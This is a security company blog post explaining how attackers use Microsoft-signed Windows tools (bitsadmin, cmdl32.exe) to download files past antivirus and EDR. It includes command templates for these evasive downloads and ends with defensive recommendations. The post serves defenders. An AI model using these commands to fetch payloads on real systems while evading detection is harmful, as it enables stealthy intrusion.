The Art of Avoiding Detection

woman on laptop writing code

You may have heard the term “living off the land” where attackers that have compromised a device within your network, will try to evade being discovered or blocked by your security solutions. Perhaps you have an EDR/MDR solution, logging capabilities, or even your own Security Operations Center (SOC) keeping an eye out for intruders. But is this enough? 

Attackers that are living off the land realize that today’s security solutions are constantly evolving, monitoring processes and programs being executed in real-time, sandboxing the unknown, and looking to see if anything malicious could be happening. So, what happens if a known, vendor-signed process or program is executed? Will your security solution detect if something malicious is secretly happening? 

On many engagements which utilize Windows Operating Systems, it has been possible to evade detection of Antivirus, as well as EDR solutions, including Windows Defender and CrowdStrike Falcon by leveraging Microsoft signed and verified tools that reside on the system. 

How attackers can avoid detection

For example, if an attacker tries to download or copy a malicious file to a compromised machine using, FTP, a web browser, a PowerShell or CMD command, the chances of this being detected can be extremely high. Especially when the file to be downloaded is a PowerShell script from GitHub which assists with Active Directory enumeration. 

access denied from github
Figure 1 - Attempted download of external resource via web browser

To evade detection, one built-in tool that may be leveraged is the ‘bitsadmin’ tool, used for managing background transfers. 

You can find this tool in the following file paths: 

  • C:\Windows\System32\bitsadmin.exe 
  • C:\Windows\SysWOW64\bitsadmin.exe 

In this scenario, it was possible to successfully download the PowerShell script from GitHub, executing a command similar to: 

				
					bitsadmin /create 1 bitsadmin /addfile 1 file-URL save-location bitsadmin /RESUME 1 bitsadmin /complete 1 
				
			
powershell command

There are many other tools that can be used here. Another example is `cmdl32.exe` which by default is located here: 

  • C:\Windows\System32\cmdl32.exe 
  • C:\Windows\SysWOW64\cmdl32.exe 

An attacker may be able to issue a CMD command as such to download a file from a remote host whilst evading the EDR solution which believes only a legitimate process is running. 

A command as simple as: 

				
					cmdl32 /vpn /lan %cd%\config 
				
			

Conclusion

With there being just a few examples, what are the recommendations? 

First, have security audits and red team scenarios executed. The goal in mind is to identify methods attackers can use to evade your existing security controls. 

Secondly, review your logging and monitoring procedures. Ensure that also built-in tools that are signed by Microsoft are being added to the watch lists. 

Last of all, not just one solution may be enough to stop the most experienced of attackers. Defense in depth is recommended, so having multiple security solutions in place might just help keep you one step in front. 

Tom Squire

Sign up for our Newsletter

Receive weekly emails for the latest cybersecurity news

Expand your team with Foresite

Enterprise-level cybersecurity and risk management for mid-sized businesses. Prioritize your security tasks and reduce the complexity of cybersecurity. 

Upcoming webinar: CMMC 101 - What Businesses Need to Know - Oct. 12, 2022 @ 2pm EST

Search